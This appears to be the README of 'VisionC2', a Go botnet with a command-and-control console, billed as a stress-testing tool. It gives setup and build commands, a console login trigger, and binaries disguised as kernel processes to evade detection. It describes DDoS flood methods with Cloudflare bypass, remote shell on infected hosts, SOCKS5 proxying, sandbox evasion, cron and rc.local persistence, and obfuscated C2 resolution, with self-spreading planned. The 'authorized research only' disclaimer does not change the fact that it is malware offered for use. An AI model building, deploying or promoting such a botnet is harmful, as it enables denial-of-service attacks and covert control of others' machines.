VisionC2 is a Go-based botnet with a TUI CNC for network stress testing, featuring TLS 1.3 encryption, 14+ architecture support, remote shell, SOCKS5 proxying, and sophisticated attack methods.
| Document | Description |
|---|---|
| USAGE.md | Full setup guide, deployment, and TUI usage |
| COMMANDS.md | Complete command reference for attacks & shell |
| CHANGELOG.md | Version history and release notes |
TLS Bypass vs one of the largest DSTAT Graphs (6 servers)
sudo apt update && sudo apt install -y upx-ucl openssl git wget gcc python3 screen
# Go 1.23+ required β https://go.dev/dl/git clone https://github.com/Syn2Much/VisionC2.git
cd VisionC2
python3 setup.pyAfter running the setup wizard, code changes will be made automatically. However, review setup_config.txt for:
- C2 address & ports
- Magic code & encryption keys
- Generated 4096-bit certificates
TUI Mode (recommended):
cd cnc
./cncSplit Mode (telnet/multi-user):
./cnc --split
# Then connect: nc <server-ip> <admin-port>
# Login trigger: spamtecBot binaries are automatically built to bot/bins/.
Binary Naming β Binaries are disguised as kernel/system processes to evade Mirai/Qbot killers and blend with legitimate processes:
| Binary | Architecture | Description |
|---|---|---|
kworkerd0 |
x86 (386) | 32-bit Intel/AMD |
ethd0 |
x86_64 | 64-bit Intel/AMD |
mdsync1 |
ARMv7 | Raspberry Pi 2/3 |
ip6addrd |
ARM64 | Raspberry Pi 4, Android |
| ... | +10 more | MIPS, PPC64, RISC-V, s390x |
See
bot/build.shorUSAGE.mdfor full 14-architecture mapping.
- Layer 4: UDP, TCP, SYN, ACK, GRE, DNS flood methods
- Layer 7: HTTP / HTTPS / TLS with HTTP/2 fingerprinting and Cloudflare UAM bypass (including CAPTCHA solving)
- Remote Execution: Interactive and fire-and-forget shell commands
- SOCKS5 Proxy: Turn any agent into a SOCKS5 proxy server
- TLS 1.3 with perfect forward secrecy
- Multi-layer obfuscation (RC4, XOR, byte substitution, MD5)
- HMAC challenge-response authentication
- Anti-analysis & sandbox detection
- Real-time bot management, visual attack builder, live shell access, and targeting filters
- Single Agent Targeting: Interactive management menu for each bot (terminal-like shell on specific bot)
- Built-in SOCKS5 Proxy Manager (one-click per bot): Easily manage new or existing proxies
- Broadcast Shell Execution with architecture, RAM, and bot count filtering
- 2 Servers = 30kβ40k Requests Per Second
- Layer 4 Throughput(2 servers): 2β6 Gbps
Note: Performance is dependent on your botsβ hardware and network.
- 14+ architecture support (automated cross-compilation)
- Fully automated 5-minute setup
Admin Console ββTLS 1.3βββΊ C2 Server βββTLS 1.3ββ Bot Agents (14+ arches)
START β Sandbox Check β[detected]ββΊ EXIT(200)
β
βΌ
Persistence (rc.local + cron)
β
βΌ
C2 Resolution: Decrypt URL β DoH TXT β DNS TXT β A Record β Direct IP
β
βΌ
TLS Connect β HMAC Auth β Command Loop ββββ Reconnect on Disconnect
BOT C2 SERVER
β ββββ TLS Handshake ββββββββββββββββΊ β
β ββββ AUTH_CHALLENGE:<random_32> βββ β Unique challenge
β Hash: Base64(MD5(challenge + MAGIC + challenge))
β ββββ AUTH_RESPONSE:<hash> βββββββββΊ β Server verifies
β ββββ AUTH_SUCCESS βββββββββββββββββΊ β
β ββββ ARCH|RAM|VERSION βββββββββββββΊ β System info
β ββββ Command Loop βββββββββββββββββΊ β
Why? Prevents replay (unique challenge) β’ No plaintext secrets β’ Lightweight MD5 for embedded
Base64 Blob β Base64 Decode β XOR (derived key) β RC4 β Byte Sub (ROL3, XOR 0xAA) β MD5 verify
βΌ
"192.168.1.1:443"
Why Multi-Layer? Base64 hides binary β’ XOR defeats static analysis β’ RC4 encrypts β’ MD5 detects tampering
- Enhanced daemonization & persistence
- Locker/killer (remove competing malware)
- Auto-generated DGA fallback domains
- Self-replication / spreading
- Single-instance port takeover
See CHANGELOG.md for detailed history.
FOR AUTHORIZED SECURITY RESEARCH AND STRESS TESTING ONLY
The authors are not responsible for any misuse, damage, or legal consequences arising from the use of this software. Use responsibly and legally.
This project is licensed under the MIT License β see the LICENSE file for details.
- Documentation: USAGE.md
- Issues & feature requests β GitHub Issues
- Contact: dev@sinners.city
